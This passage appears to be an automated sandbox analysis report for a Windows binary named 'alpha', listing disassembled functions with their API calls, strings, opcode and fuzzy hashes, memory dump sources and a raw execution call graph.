                                                                                                          • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                          • API String ID: 3282654869-1994581435
                                                                                                          • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                          • Instruction ID: 3421365fc4316141d1e7085e1883034efe92e208ba31e61c4dd4459670dc3548
                                                                                                          • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                          • Instruction Fuzzy Hash: 9D610272A0B342C2FA5AAB1DF450679E294AF057ACFDA4635CA1D076F4EE3CE4418720
                                                                                                          Function 00007FF7AB1510D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7AB14827A), ref: 00007FF7AB1511DC
                                                                                                          • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7AB14827A), ref: 00007FF7AB151277
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                          • API String ID: 1135967885-381716982
                                                                                                          • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                          • Instruction ID: 5b076c5eb20c6234371553485e8776a12fb75699f71d2525b927b572e4cb59b8
                                                                                                          • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                          • Instruction Fuzzy Hash: 8871D77190A24686D762AF1DF4D0679F6A4FB9879CF920336C94E83BB0DF3CA4519B10
                                                                                                          Function 00007FF7AB1508EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmovewcsncmp
                                                                                                          • String ID: 0123456789
                                                                                                          • API String ID: 3879766669-2793719750
                                                                                                          • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                          • Instruction ID: b1c65fad879541d4b4ee6d8f6d45a91588e72276dbeb39305840e1515f1e051b
                                                                                                          • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                          • Instruction Fuzzy Hash: 0E41FB22F1A78645EA66AF6DF4442BAA394FB44BC8F865231CE4E477B4DF3CD4418350
                                                                                                          Function 00007FF7AB149784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB1497D0
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB1498D7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                          • String ID: Software\Classes
                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                          • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                          • Instruction ID: 77f1b81a972cbb77ae7b4a6deadf5f66b9816bd224ec033315eb692fbf98dccb
                                                                                                          • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                          • Instruction Fuzzy Hash: 6441D562A0A756C5EA02EB1DE445039A3A4FB44BD8FA28131DA1D437F5FF39D851C350
                                                                                                          Function 00007FF7AB14A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14A0FC
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14A1FB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                          • String ID: Software\Classes
                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                          • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                          • Instruction ID: b61ef73253eb750bcec097d296d68ebf176054f4745c943fa7b0fdf9f6421546
                                                                                                          • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                          • Instruction Fuzzy Hash: C241D662A1A796C1EA02EB1DE444439A3A4FB45BD8F928131DE5D437F4EF39D881C350
                                                                                                          Function 00007FF7AB12CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleTitle
                                                                                                          • String ID: -
                                                                                                          • API String ID: 3358957663-3695764949
                                                                                                          • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                          • Instruction ID: 919052576e9175d2cf851e1d5c372a9c38828b7e7157b4d2eb120a50256b44a2
                                                                                                          • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                          • Instruction Fuzzy Hash: 4D31B425A0A74682E616BB19F450078E6A5BB49BD8F964135CE0E077F1EF3CE445C360
                                                                                                          Function 00007FF7AB137280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmpswscanf
                                                                                                          • String ID: :EOF
                                                                                                          • API String ID: 1534968528-551370653
                                                                                                          • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                          • Instruction ID: 451325cc4b699a8202dc27a87ff863b4a8bde8d5643453b3744a0c343026931b
                                                                                                          • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                          • Instruction Fuzzy Hash: 29315235A0E64686F69AAB1DF440678F2E0EF44758FC64131DA4D06275EF3CE9458660
                                                                                                          Function 00007FF7AB123BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmp
                                                                                                          • String ID: /-Y
                                                                                                          • API String ID: 1886669725-4274875248
                                                                                                          • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                          • Instruction ID: d22f2ad07408d64b688d2041d3eede700ea501d25f02cdd69a2731510e7b29b1
                                                                                                          • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                          • Instruction Fuzzy Hash: 85218365E09756C5EA11AB0AF440178F6A0BB44FC8F964032DE99077B4EF3CE4A2D720
                                                                                                          Function 00007FF7AB12B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 3$3
                                                                                                          • API String ID: 0-2538865259
                                                                                                          • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                          • Instruction ID: e9892f9685899c4c590250c996f03203942766e30f60ee3b67326c79bd9855c9
                                                                                                          • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                          • Instruction Fuzzy Hash: AF013271D0B58ACAF31BAB6CF9A4274F660BF4831DFD60536C40E425B1DF2D68848662
                                                                                                          Function 00007FF7AB1306C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                          • Instruction ID: 863bbffe3e82f634f7adfd5634ec8fbfbcfebbcc4236ea0605f1a26a9ab0e9b0
                                                                                                          • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                          • Instruction Fuzzy Hash: E4417E72A0A64286EA5AAF18F454279F7E1FF49B48F968534D64E03770EF3CE444C760

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.6%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:1410
                                                                                                          Total number of Limit Nodes:28
                                                                                                          execution_graph 16837 7ff7ab127a40 16840 7ff7ab127d30 memset 16837->16840 16839 7ff7ab127a5a 16872 7ff7ab12ca40 16840->16872 16845 7ff7ab123278 166 API calls 16864 7ff7ab13af91 16845->16864 16848 7ff7ab13af7e 16849 7ff7ab13af89 16848->16849 16857 7ff7ab13af72 16848->16857 16850 7ff7ab131ea0 8 API calls 16849->16850 16850->16864 16854 7ff7ab13afae 16854->16857 16866 7ff7ab13afce 16854->16866 16856 7ff7ab127ea4 16858 7ff7ab127eb7 ??_V@YAXPEAX 16856->16858 16859 7ff7ab127ec3 16856->16859 16857->16845 16858->16859 16931 7ff7ab138f80 16859->16931 16860 7ff7ab13b024 16863 7ff7ab123278 166 API calls 16860->16863 16863->16864 16864->16839 16866->16864 17015 7ff7ab123278 16866->17015 16870 7ff7ab127e09 16870->16854 16870->16856 16870->16857 16870->16860 16870->16864 16920 7ff7ab131ea0 16870->16920 16927 7ff7ab12b900 16870->16927 16939 7ff7ab13823c FindFirstFileExW 16870->16939 16953 7ff7ab128b20 16870->16953 16992 7ff7ab12b364 16870->16992 16998 7ff7ab128940 16870->16998 17004 7ff7ab138a70 16870->17004 17009 7ff7ab133a0c 16870->17009 16873 7ff7ab12ca59 16872->16873 16874 7ff7ab127dc3 16872->16874 17018 7ff7ab139324 16873->17018 16874->16857 16883 7ff7ab13417c 16874->16883 16877 7ff7ab13c6e0 17022 7ff7ab146d1c 16877->17022 16878 7ff7ab12ca84 16880 7ff7ab12ca9b memset 16878->16880 16881 7ff7ab13c706 ??_V@YAXPEAX 16878->16881 16880->16874 16884 7ff7ab1341a8 GetCurrentDirectoryW 16883->16884 16885 7ff7ab1341d4 towupper 16883->16885 16891 7ff7ab1341b9 16884->16891 17094 7ff7ab13081c GetEnvironmentVariableW 16885->17094 16888 7ff7ab138f80 7 API calls 16890 7ff7ab127dee 16888->16890 16889 7ff7ab13ecac towupper 16892 7ff7ab12d3f0 16890->16892 16891->16888 16893 7ff7ab12d810 16892->16893 16894 7ff7ab12d420 16892->16894 17245 7ff7ab12b998 16893->17245 16897 7ff7ab13caad 16894->16897 16898 7ff7ab12d46e GetProcessHeap HeapAlloc 16894->16898 16896 7ff7ab12d515 16915 7ff7ab12d544 16896->16915 16899 7ff7ab123278 166 API calls 16897->16899 16898->16897 16903 7ff7ab12d49a 16898->16903 16900 7ff7ab13cab7 16899->16900 16902 7ff7ab139158 7 API calls 16902->16915 16903->16896 16904 7ff7ab12d4e8 wcschr 16903->16904 16903->16915 16904->16903 16905 7ff7ab13ca31 wcschr 16905->16915 16906 7ff7ab12d54a iswspace 16909 7ff7ab12d561 wcschr 16906->16909 16906->16915 16907 7ff7ab12d5ee GetProcessHeap HeapReAlloc 16907->16897 16908 7ff7ab12d61d GetProcessHeap HeapSize 16907->16908 16908->16915 16909->16915 16910 7ff7ab12d586 wcschr 16910->16915 16911 7ff7ab12d6ff iswspace 16912 7ff7ab12d712 wcschr 16911->16912 16911->16915 16912->16915 16913 7ff7ab12d668 16916 7ff7ab138f80 7 API calls 16913->16916 16914 7ff7ab12d759 wcschr 16914->16915 16915->16897 16915->16902 16915->16905 16915->16906 16915->16907 16915->16910 16915->16911 16915->16913 16915->16914 16917 7ff7ab12d6c5 wcschr 16915->16917 16918 7ff7ab13ca5a wcschr 16915->16918 17274 7ff7ab14e91c 16915->17274 16919 7ff7ab127dfb 16916->16919 16917->16915 16918->16915 16919->16848 16919->16870 16921 7ff7ab131eae wcschr 16920->16921 16922 7ff7ab131ec4 16920->16922 16921->16922 16923 7ff7ab131ece 16921->16923 16922->16870 16924 7ff7ab131f3f 16923->16924 16925 7ff7ab139158 7 API calls 16923->16925 16924->16870 16926 7ff7ab131f53 16925->16926 16928 7ff7ab12b914 16927->16928 16928->16928 16929 7ff7ab12cd90 166 API calls 16928->16929 16930 7ff7ab12b92a 16929->16930 16930->16870 16932 7ff7ab138f89 16931->16932 16933 7ff7ab127ed5 16932->16933 16934 7ff7ab138fe0 RtlCaptureContext RtlLookupFunctionEntry 16932->16934 16933->16839 16935 7ff7ab139067 16934->16935 16936 7ff7ab139025 RtlVirtualUnwind 16934->16936 17455 7ff7ab138fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16935->17455 16936->16935 16940 7ff7ab1382cd 16939->16940 16941 7ff7ab13829d GetLastError 16939->16941 16943 7ff7ab138365 FindNextFileW 16940->16943 16946 7ff7ab1382e5 16940->16946 16942 7ff7ab1382af 16941->16942 16942->16870 16944 7ff7ab13837d 16943->16944 16945 7ff7ab1383d0 FindClose 16943->16945 16944->16940 16947 7ff7ab138386 16944->16947 16945->16946 16948 7ff7ab138332 GetProcessHeap HeapAlloc 16946->16948 16949 7ff7ab138302 16946->16949 16951 7ff7ab138310 16946->16951 16947->16941 16948->16951 16950 7ff7ab13838b GetProcessHeap HeapReAlloc 16949->16950 16949->16951 16950->16951 16952 7ff7ab1450f8 GetLastError FindClose 16950->16952 16951->16941 16951->16942 16952->16942 16954 7ff7ab128b51 16953->16954 16955 7ff7ab128b79 16954->16955 16956 7ff7ab13b444 SetErrorMode 16954->16956 16957 7ff7ab12b998 207 API calls 16955->16957 17456 7ff7ab1326e0 16956->17456 16959 7ff7ab128b83 16957->16959 16963 7ff7ab128ba6 wcsrchr 16959->16963 16972 7ff7ab128bc6 _wcsicmp 16959->16972 16976 7ff7ab128c06 16959->16976 16960 7ff7ab13b46a 16962 7ff7ab13b49d 16960->16962 16966 7ff7ab1301b8 6 API calls 16960->16966 16961 7ff7ab128d6c wcsrchr 16961->16976 16964 7ff7ab13b4b2 16962->16964 16965 7ff7ab13b4d6 16962->16965 16963->16972 16973 7ff7ab123278 166 API calls 16964->16973 16980 7ff7ab13b499 16964->16980 16968 7ff7ab123278 166 API calls 16965->16968 16969 7ff7ab13b478 16966->16969 16967 7ff7ab12b998 207 API calls 16967->16976 16968->16980 16974 7ff7ab13b487 16969->16974 17480 7ff7ab14f318 _get_osfhandle GetFileType 16969->17480 16971 7ff7ab128be8 _wcsicmp 16971->16976 16972->16971 16972->16976 16973->16980 16975 7ff7ab1301b8 6 API calls 16974->16975 16978 7ff7ab13b48e 16975->16978 16976->16961 16976->16967 16979 7ff7ab128c13 GetFileAttributesW 16976->16979 16986 7ff7ab128c49 16976->16986 16978->16980 17481 7ff7ab14f318 _get_osfhandle GetFileType 16978->17481 16979->16976 16983 7ff7ab128c2f GetLastError 16979->16983 16981 7ff7ab13b4f4 SetErrorMode 16980->16981 16984 7ff7ab12d208 _close 16980->16984 16981->16955 16982 7ff7ab13b483 16982->16962 16982->16974 16983->16976 16984->16981 16987 7ff7ab128ce6 16986->16987 16988 7ff7ab128cab wcschr 16986->16988 16987->16870 16989 7ff7ab128d1d wcschr 16988->16989 16990 7ff7ab128cc4 16988->16990 16989->16990 16991 7ff7ab128ccf wcschr 16989->16991 16990->16991 16991->16987 16993 7ff7ab12ca40 17 API calls 16992->16993 16994 7ff7ab12b396 16993->16994 16995 7ff7ab146d1c 14 API calls 16994->16995 16996 7ff7ab12b3ca 16994->16996 16997 7ff7ab13c27c 16995->16997 16996->16870 16999 7ff7ab12ca40 17 API calls 16998->16999 17000 7ff7ab128972 16999->17000 17001 7ff7ab146d1c 14 API calls 17000->17001 17002 7ff7ab1289a6 17000->17002 17003 7ff7ab13b3f6 17001->17003 17002->16870 17005 7ff7ab138a93 FindNextFileW 17004->17005 17006 7ff7ab138acd 17005->17006 17007 7ff7ab138aa3 GetLastError 17005->17007 17006->17005 17008 7ff7ab138ab7 17006->17008 17007->17008 17008->16870 17010 7ff7ab133a25 17009->17010 17011 7ff7ab133a53 FindClose 17009->17011 17010->17011 17014 7ff7ab13ec38 17010->17014 17012 7ff7ab133a66 17011->17012 17013 7ff7ab133a74 GetLastError 17011->17013 17012->16870 17013->17012 17482 7ff7ab1232b0 17015->17482 17017 7ff7ab1232a4 17017->16864 17019 7ff7ab139330 17018->17019 17025 7ff7ab139a6c 17019->17025 17021 7ff7ab12ca7b 17021->16877 17021->16878 17030 7ff7ab146c5c 17022->17030 17026 7ff7ab139a86 malloc 17025->17026 17027 7ff7ab139a77 17026->17027 17028 7ff7ab139a91 17026->17028 17027->17026 17029 7ff7ab139a97 Concurrency::cancel_current_task 17027->17029 17028->17021 17029->17021 17033 7ff7ab146a34 17030->17033 17034 7ff7ab146a41 17033->17034 17041 7ff7ab1463fc 17034->17041 17038 7ff7ab146b1d 17039 7ff7ab138f80 7 API calls 